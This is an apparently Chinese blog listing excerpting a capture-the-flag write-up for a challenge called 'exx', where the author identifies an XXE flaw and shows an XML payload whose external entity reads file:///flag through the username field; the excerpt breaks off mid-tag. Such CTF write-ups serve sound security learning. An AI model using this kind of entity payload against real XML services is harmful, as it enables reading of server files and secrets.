摘要: exx 查看源码,发现 可以判定考的是XXE,抓包,payload: <!DOCTYPE ANY [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user><username>&admin;</username><password>admin</passwor 阅读全文
posted @ 2024-06-01 21:42 duskto 阅读(66) 评论(0) 推荐(0)